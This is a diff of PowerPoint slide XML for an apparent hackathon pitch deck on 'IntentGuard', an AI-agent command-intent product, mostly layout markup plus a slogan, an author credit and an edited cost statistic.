+                  <a:schemeClr val="lt1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl2pPr>
+            <a:lvl3pPr marL="914400" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="lt1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl3pPr>
+            <a:lvl4pPr marL="1371600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="lt1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl4pPr>
+            <a:lvl5pPr marL="1828800" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="lt1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl5pPr>
+            <a:lvl6pPr marL="2286000" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="lt1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl6pPr>
+            <a:lvl7pPr marL="2743200" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="lt1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl7pPr>
+            <a:lvl8pPr marL="3200400" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="lt1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl8pPr>
+            <a:lvl9pPr marL="3657600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="lt1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl9pPr>
+          </a:lstStyle>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="7" name="Picture 6">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1626D35A-5173-E689-E818-661F1A41CC54}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId2"/>
+          <a:srcRect r="427" b="1"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="20" y="961"/>
+            <a:ext cx="9143980" cy="5142539"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
+    </p:spTree>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide19.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:bg>
+      <p:bgPr>
+        <a:solidFill>
+          <a:schemeClr val="bg1"/>
+        </a:solidFill>
+        <a:effectLst/>
+      </p:bgPr>
+    </p:bg>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
           <p:cNvPr id="13" name="Rectangle 12">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
@@ -7597,157 +7758,6 @@
           </a:prstGeom>
         </p:spPr>
       </p:pic>
-    </p:spTree>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:sld>
-</file>
-
-<file path=ppt/slides/slide19.xml><?xml version="1.0" encoding="utf-8"?>
-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
-  <p:cSld>
-    <p:bg>
-      <p:bgPr>
-        <a:solidFill>
-          <a:srgbClr val="0F0F1A"/>
-        </a:solidFill>
-        <a:effectLst/>
-      </p:bgPr>
-    </p:bg>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name=""/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="2" name="TextBox 1"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="731520" y="1463040"/>
-            <a:ext cx="7680960" cy="1097280"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="ctr">
-              <a:defRPr sz="3200" b="1">
-                <a:solidFill>
-                  <a:srgbClr val="F8F8F8"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-IN"/>
-              <a:t>Every command has intent.</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-IN"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-IN"/>
-              <a:t>IntentGuard ensures it's yours.</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="3" name="TextBox 2"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="731520" y="3017520"/>
-            <a:ext cx="7680960" cy="365760"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="ctr">
-              <a:defRPr sz="1600" b="0">
-                <a:solidFill>
-                  <a:srgbClr val="00D4AA"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-IN"/>
-              <a:t>— Because "allowed" ≠ "intended"</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="4" name="TextBox 3"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="731520" y="3931920"/>
-            <a:ext cx="7680960" cy="365760"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="ctr">
-              <a:defRPr sz="1200" b="0">
-                <a:solidFill>
-                  <a:srgbClr val="707088"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-IN"/>
-              <a:t>Rachit Gupta  •  CDAC Hackathon 2026  •  Cybersecurity / Trusted AI</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
     </p:spTree>
   </p:cSld>
   <p:clrMapOvr>
@@ -7908,7 +7918,23 @@
             </a:br>
             <a:r>
               <a:rPr dirty="0"/>
-              <a:t>₹19.5 crore ($2.36M) — AI agents now execute 40% of cloud ops unsupervised.</a:t>
+              <a:t>₹19</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>0</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr dirty="0"/>
+              <a:t>.5 crore ($23</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>.</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr dirty="0"/>
+              <a:t>6M) — AI agents now execute 40% of cloud ops unsupervised.</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -8096,13 +8122,13 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide3.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide20.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:bg>
       <p:bgPr>
         <a:solidFill>
-          <a:srgbClr val="141428"/>
+          <a:srgbClr val="0F0F1A"/>
         </a:solidFill>
         <a:effectLst/>
       </p:bgPr>
@@ -8129,8 +8155,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="548640" y="274320"/>
-            <a:ext cx="7772400" cy="640080"/>
+            <a:off x="731520" y="1463040"/>
+            <a:ext cx="7680960" cy="1097280"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -8143,8 +8169,8 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr algn="l">
-              <a:defRPr sz="2600" b="1">
+            <a:pPr algn="ctr">
+              <a:defRPr sz="3200" b="1">
                 <a:solidFill>
                   <a:srgbClr val="F8F8F8"/>
                 </a:solidFill>
@@ -8152,40 +8178,174 @@
               </a:defRPr>
             </a:pPr>
             <a:r>
-              <a:t>REAL-WORLD PAIN</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="3" name="Rectangle 2"/>
-          <p:cNvSpPr/>
+              <a:rPr lang="en-IN"/>
+              <a:t>Every command has intent.</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-IN"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-IN"/>
+              <a:t>IntentGuard ensures it's yours.</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="TextBox 2"/>
+          <p:cNvSpPr txBox="1"/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="548640" y="868680"/>
-            <a:ext cx="1828800" cy="38100"/>
+            <a:off x="731520" y="3017520"/>
+            <a:ext cx="7680960" cy="365760"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr">
+              <a:defRPr sz="1600" b="0">
+                <a:solidFill>
+                  <a:srgbClr val="00D4AA"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-IN"/>
+              <a:t>— Because "allowed" ≠ "intended"</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="TextBox 3"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="731520" y="3931920"/>
+            <a:ext cx="7680960" cy="365760"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr">
+              <a:defRPr sz="1200" b="0">
+                <a:solidFill>
+                  <a:srgbClr val="707088"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-IN"/>
+              <a:t>Rachit Gupta  •  CDAC Hackathon 2026  •  Cybersecurity / Trusted AI</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide3.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:bg>
+      <p:bgPr>
+        <a:solidFill>
+          <a:schemeClr val="bg1"/>
+        </a:solidFill>
+        <a:effectLst/>
+      </p:bgPr>
+    </p:bg>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="22" name="Rectangle 21">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14995E8B-DB3C-4E23-9186-1613402BFDCF}"/>
+              </a:ext>
+              <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
+                <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noMove="1" noResize="1" noEditPoints="1" noAdjustHandles="1" noChangeArrowheads="1" noChangeShapeType="1" noTextEdit="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:extLst>
+              <p:ext uri="{386F3935-93C4-4BCD-93E2-E3B085C9AB24}">
+                <p16:designElem xmlns:p16="http://schemas.microsoft.com/office/powerpoint/2015/main" val="1"/>
+              </p:ext>
+            </p:extLst>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="2286" y="0"/>
+            <a:ext cx="9141714" cy="5143500"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
           </a:prstGeom>
           <a:solidFill>
-            <a:srgbClr val="00D4AA"/>
+            <a:schemeClr val="tx2"/>
           </a:solidFill>
           <a:ln>
             <a:noFill/>
           </a:ln>
         </p:spPr>
         <p:style>
-          <a:lnRef idx="1">
-            <a:schemeClr val="accent1"/>
+          <a:lnRef idx="2">
+            <a:schemeClr val="accent1">
+              <a:shade val="50000"/>
+            </a:schemeClr>
           </a:lnRef>
-          <a:fillRef idx="3">
+          <a:fillRef idx="1">
             <a:schemeClr val="accent1"/>
           </a:fillRef>
-          <a:effectRef idx="2">
+          <a:effectRef idx="0">
             <a:schemeClr val="accent1"/>
           </a:effectRef>
           <a:fontRef idx="minor">
@@ -8197,367 +8357,1061 @@
           <a:lstStyle/>
           <a:p>
             <a:pPr algn="ctr"/>
-            <a:endParaRPr/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="4" name="TextBox 3"/>
-          <p:cNvSpPr txBox="1"/>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="21" name="Rectangle 20">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF21E7C5-2080-4549-97AA-9A6688257789}"/>
+              </a:ext>
+              <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
+                <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noMove="1" noResize="1" noEditPoints="1" noAdjustHandles="1" noChangeArrowheads="1" noChangeShapeType="1" noTextEdit="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:extLst>
+              <p:ext uri="{386F3935-93C4-4BCD-93E2-E3B085C9AB24}">
+                <p16:designElem xmlns:p16="http://schemas.microsoft.com/office/powerpoint/2015/main" val="1"/>
+              </p:ext>
+            </p:extLst>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="0" y="0"/>
+            <a:ext cx="9141714" cy="5143500"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:solidFill>
+            <a:schemeClr val="tx1">
+              <a:alpha val="53000"/>
+            </a:schemeClr>
+          </a:solidFill>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="2">
+            <a:schemeClr val="accent1">
+              <a:shade val="50000"/>
+            </a:schemeClr>
+          </a:lnRef>
+          <a:fillRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="0">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="23" name="Rectangle 22">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57957B04-C024-4B5F-B7C3-20FAE3F1D3CA}"/>
+              </a:ext>
+              <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
+                <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noMove="1" noResize="1" noEditPoints="1" noAdjustHandles="1" noChangeArrowheads="1" noChangeShapeType="1" noTextEdit="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:extLst>
+              <p:ext uri="{386F3935-93C4-4BCD-93E2-E3B085C9AB24}">
+                <p16:designElem xmlns:p16="http://schemas.microsoft.com/office/powerpoint/2015/main" val="1"/>
+              </p:ext>
+            </p:extLst>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm rot="16200000">
+            <a:off x="7828610" y="781954"/>
+            <a:ext cx="2097346" cy="533439"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:gradFill flip="none" rotWithShape="1">
+            <a:gsLst>
+              <a:gs pos="0">
+                <a:schemeClr val="tx2">
+                  <a:lumMod val="40000"/>
+                  <a:lumOff val="60000"/>
+                  <a:alpha val="0"/>
+                </a:schemeClr>
+              </a:gs>
+              <a:gs pos="100000">
+                <a:schemeClr val="tx2">
+                  <a:lumMod val="75000"/>
+                  <a:alpha val="10000"/>
+                </a:schemeClr>
+              </a:gs>
+            </a:gsLst>
+            <a:lin ang="8400000" scaled="0"/>
+            <a:tileRect/>
+          </a:gradFill>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="2">
+            <a:schemeClr val="accent1">
+              <a:shade val="50000"/>
+            </a:schemeClr>
+          </a:lnRef>
+          <a:fillRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="0">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="25" name="Rectangle 24">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6FBFCE4-B693-49EB-9CE1-4420332195E7}"/>
+              </a:ext>
+              <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
+                <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noMove="1" noResize="1" noEditPoints="1" noAdjustHandles="1" noChangeArrowheads="1" noChangeShapeType="1" noTextEdit="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:extLst>
+              <p:ext uri="{386F3935-93C4-4BCD-93E2-E3B085C9AB24}">
+                <p16:designElem xmlns:p16="http://schemas.microsoft.com/office/powerpoint/2015/main" val="1"/>
+              </p:ext>
+            </p:extLst>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm rot="10800000">
+            <a:off x="0" y="4605588"/>
+            <a:ext cx="4571997" cy="533439"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:gradFill flip="none" rotWithShape="1">
+            <a:gsLst>
+              <a:gs pos="10000">
+                <a:schemeClr val="tx2">
+                  <a:lumMod val="50000"/>
+                  <a:alpha val="10000"/>
+                </a:schemeClr>
+              </a:gs>
+              <a:gs pos="100000">
+                <a:schemeClr val="tx2">
+                  <a:lumMod val="60000"/>
+                  <a:lumOff val="40000"/>
+                  <a:alpha val="0"/>
+                </a:schemeClr>
+              </a:gs>
+            </a:gsLst>
+            <a:lin ang="8400000" scaled="0"/>
+            <a:tileRect/>
+          </a:gradFill>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="2">
+            <a:schemeClr val="accent1">
+              <a:shade val="50000"/>
+            </a:schemeClr>
+          </a:lnRef>
+          <a:fillRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="0">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:grpSp>
+        <p:nvGrpSpPr>
+          <p:cNvPr id="27" name="Group 26">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FFC4225-9683-4D55-8686-FCDDB8BCBF38}"/>
+              </a:ext>
+              <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
+                <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvGrpSpPr>
+            <a:grpSpLocks noGrp="1" noUngrp="1" noRot="1" noChangeAspect="1" noMove="1" noResize="1"/>
+          </p:cNvGrpSpPr>
+          <p:nvPr>
+            <p:extLst>
+              <p:ext uri="{386F3935-93C4-4BCD-93E2-E3B085C9AB24}">
+                <p16:designElem xmlns:p16="http://schemas.microsoft.com/office/powerpoint/2015/main" val="1"/>
+              </p:ext>
+            </p:extLst>
+          </p:nvPr>
+        </p:nvGrpSpPr>
+        <p:grpSpPr>
+          <a:xfrm rot="5400000">
+            <a:off x="-485051" y="4386794"/>
+            <a:ext cx="964406" cy="549007"/>
+            <a:chOff x="7029447" y="3514725"/>
+            <a:chExt cx="1285875" cy="549007"/>
+          </a:xfrm>
+        </p:grpSpPr>
+        <p:cxnSp>
+          <p:nvCxnSpPr>
+            <p:cNvPr id="28" name="Straight Connector 27">
+              <a:extLst>
+                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23CC42CD-CAE0-4CF0-B118-067FD44AE1EA}"/>
+                </a:ext>
+                <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
+                  <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
+                </a:ext>
+              </a:extLst>
+            </p:cNvPr>
+            <p:cNvCxnSpPr>
+              <a:cxnSpLocks/>
+            </p:cNvCxnSpPr>
+            <p:nvPr>
+              <p:extLst>
+                <p:ext uri="{386F3935-93C4-4BCD-93E2-E3B085C9AB24}">
+                  <p16:designElem xmlns:p16="http://schemas.microsoft.com/office/powerpoint/2015/main" val="1"/>
+                </p:ext>
+              </p:extLst>
+            </p:nvPr>
+          </p:nvCxnSpPr>
+          <p:spPr>
+            <a:xfrm>
+              <a:off x="7029447" y="3514725"/>
+              <a:ext cx="1285875" cy="0"/>
+            </a:xfrm>
+            <a:prstGeom prst="line">
+              <a:avLst/>
+            </a:prstGeom>
+            <a:ln w="31750" cap="rnd" cmpd="sng">
+              <a:gradFill>
+                <a:gsLst>
+                  <a:gs pos="0">
+                    <a:schemeClr val="tx2">
+                      <a:lumMod val="60000"/>
+                      <a:lumOff val="40000"/>
+                      <a:alpha val="40000"/>
+                    </a:schemeClr>
+                  </a:gs>
+                  <a:gs pos="100000">
+                    <a:schemeClr val="tx2">
+                      <a:lumMod val="50000"/>
+                      <a:alpha val="40000"/>
+                    </a:schemeClr>
+                  </a:gs>
+                </a:gsLst>
+                <a:lin ang="5400000" scaled="1"/>
+              </a:gradFill>
